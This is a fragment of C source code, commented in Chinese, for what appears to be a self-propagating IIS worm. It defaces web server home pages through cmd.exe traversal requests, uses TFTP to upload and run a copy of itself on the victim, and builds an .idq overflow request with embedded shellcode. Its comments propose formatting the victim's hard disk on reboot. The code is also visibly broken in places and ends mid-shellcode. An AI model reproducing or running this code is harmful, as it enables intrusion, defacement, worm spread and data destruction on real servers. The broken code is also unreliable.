SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);//DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一index.asp>+%s\\index.asp HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("修改首页index.asp \n");
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
//printf("不能修改,文件属性有问题");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);//DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一index.html>+%s\\index.html HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("修改首页index.html \n");
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p=NULL)
{
//printf("不能修改,文件属性有问题");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);//DstSAin.sin_addr.s_addr=iplookup(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%secho+我爱你张一default.htm>+%s\\default.htm HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space,WebPath);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("修改首页default.htm \n");
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
//printf("不能修改,文件属性有问题");
}
closesocket(SockFD);
}
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%s+TFTP%20-i%20"&GetLocalIP()&"%20Get%20ssrv.exe%20%ssrv.exe HTTP/1.0\n\n",ExeDirs[exenum],uniwaste,space,dletter);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("正在上传自身")
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"Access is denied");
if(p!=NULL)
{
//printf("system32不允许写操作");
}
closesocket(SockFD);
}
file://运行
memset(waste,0,500);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.S_un.S_addr=htonl(host);
sprintf(waste,"GET /%s/%s/winnt/system32/cmd.exe?/c%ssrv.exe HTTP/1.0\n\n",ExeDirs[exenum],uniwaste);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
//printf("在主机上运行自己 \n");
send(SockFD,waste,strlen(waste),0); file://try one of the directories
buffer=GetData(SockFD);
p=strstr(buffer,"CGI Error");
if(p!=NULL)
{
// printf("运行成功");//此时存在漏洞的主机开始扫描自己IP段附近的漏洞主机
}
closesocket(SockFD);
}
file://return 1;
}
}
if(num<23)//循环尝试漏洞编码
{ num++;
closesocket(SockFD);
goto crack;
}
else
{
if(exenum<6)//遍历各个目录
{
num=0;
exenum++;
ExeDirNum=exenum;
closesocket(SockFD);
goto crack;
}
closesocket(SockFD);
}
//printf("扫描全部结束,在此应该进行破坏性操作...\n");
file://可选办法,在目标主机上的autoexec.bat里加上格式化硬盘命令
file://然后执行ExitSystem(1);使主机重新启动
file://重新启动后格式化硬盘
}
return 0;
}
file://在返回的数据中查找指定信息
char* find(const char*pszSource,const char* pszKey)
{
static char szBuffer[2049];
const char * p;
const char * q;
p = q = NULL;
p = strstr(pszSource,pszKey);
if ( p != NULL )
{
p += strlen(pszKey);
q = strstr(p,"\r\n");
if ( q == NULL )
q = p + strlen(p);
strncpy(szBuffer,p,q-p);
return szBuffer;
}
return NULL;
}
char *GetData(int SockFD)
{
file://get data without a blocking recv so we dont hang if we crash the server
char *buffer;
char data[2001];
unsigned long on=1;
unsigned long off=0;
char waste[2001];
int p, i=1;
int t;
memset(data,0,2001);
p=ioctlsocket(SockFD,FIONBIO,&on);
memset(waste,0,2001);
for(t=1;t<10;t++){
i=recv(SockFD, waste, 2000, 0);
if(i>0)
break;
Sleep(500);
}
waste[i]='\0';
strncat(data,waste,2000);
buffer = ( char * )malloc( 2000 * sizeof( char ) );
strncpy( buffer, data, 2000 );
return buffer;
}
int WINAPI redcode(char *argv[])
{
int i,j,s,pid;
unsigned int cb;
unsigned short port;
char *p,buf[512],buf2[512],buf3[2048];
FILE *fp;
HMODULE g_module=NULL
char svFileName[512]
g_module=GetModuleHandle(NULL)
GetModuleFileName(g_module,svFileName,512)
if((fp=fopen(svFileName,"rb"))==0)
return -2;
if(!(cb=resolve(ADDR)))
return -3;
if((pid=fork())<0)
return -4;
if(pid)
{
fclose(fp);
s = make_connection(argv[1],80);
if(s<0)
{
//printf("connect error:[%d].\n",s);
kill(pid,SIGTERM);
return -5;
}
j = strlen(shellcode);
*(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA;
*(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS;
port = htons(PORT);
port ^= PORTMASK;
cb ^= ADDRMASK;
*(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK;
*(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK;
*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned int *)&shellcode[ADDR_OFFSET] = cb;
for(i=0;i<strlen(shellcode);i++)
{
if((shellcode[i]==0x0a)||
(shellcode[i]==0x0d)||
(shellcode[i]==0x3a))
break;
}
if(i!=j)
{
//printf("bad portno or ip address...\n");
close(s);
kill(pid,SIGTERM);
return -6;
}
memset(buf,1,sizeof(buf));
p = &buf[OFFSET-2];
sprintf(p,"%s",forwardjump);
p += strlen(forwardjump);
*p++ = 1;
*p++ = '%';
*p++ = 'u';
sprintf(p,"%04x",(RET>>0)&0xffff);
p += 4;
*p++ = '%';
*p++ = 'u';
sprintf(p,"%04x",(RET>>16)&0xffff);
p += 4;
*p++ = 1;
sprintf(p,"%s",jump_to_shell);
memset(buf2,NOP,sizeof(buf2));
memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],storage,strlen(storage));
memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(shellcode));
buf2[sizeof(buf2)-1] = 0;
sprintf(buf3,"GET /a.idq?%s=a HTTP/1.0\r\nShell: %s\r\n\r\n",buf,buf2);
write(s,buf3,strlen(buf3));
//printf("---");
for(i=0;i<strlen(buf3);i++)
{
if((i%16)==0)
//printf("\n");
//printf("%02X ",buf3[i]&0xff);
}
//printf("\n---\n");
wait(0);
sleep(1);
shutdown(s,2);
close(s);
//printf("Done.\n");
}
else
{
s = get_connection(PORT);
j = 0;
while((i=fread(buf,1,sizeof(buf),fp)))
{
write(s,buf,i);
j += i;
printf(".");
fflush(stdout);
}
fclose(fp);
//printf("\n%d bytes send...\n",j);
shutdown(s,2);
close(s);
}
return 0;
}
int winapi iis4(char *argv[]) {
WORD wVersionRequested;
WSADATA wsaData;
int err;
SOCKADDR_IN sin,sout;
int soutsize=sizeof(sout);
unsigned long threadid,bytesread;
SOCKET s,in;
wVersionRequested = MAKEWORD(1, 1);
HANDLE hf;
string sfname;
GetModuleFileName(NULL,sfname,MAX_PATH)
hf = CreateFile(sfname,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
sizemybytes = GetFileSize(hf,NULL);
mybytes = (char *)malloc(sizemybytes);
ReadFile(hf,mybytes,sizemybytes,&bytesread,0);
CloseHandle(hf);
err = WSAStartup(wVersionRequested, &wsaData);
if (err != 0)
return;
setuphostname();
attack(argv[1])
s = socket(AF_INET,SOCK_STREAM,0);
if (s==-1)
return;
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = 0;
sin.sin_port = htons(80);
if (bind(s, (LPSOCKADDR)&sin, sizeof (sin))!=0) return;
if (listen(s,5)!=0) return;
while (1) {
in = accept(s,(sockaddr *)&sout,&soutsize);
CreateThread(0,0,doweb,&in,0,&threadid);
}
int winapi xpmethd(char *argv[])
{
int sockfd[MAX];
char sendXP[]="XP";
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;
WSAdata wsd
int eerx=wsastartup(0x0101,&wsd)
if (eerx!=0)
{
WSAcleanup()
return 0
}
unsigned char shellcode[] =
"\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
"\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
"\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
"\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
"\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
"\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
"\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
"\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
"\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
"\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
"\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
"\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
"\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
"\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
"\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
"\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
"\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
"\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
"\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
"\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
"\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
"\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
"\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
"\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
"\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
"\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
"\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
"\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
"\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
"\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
"\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\x
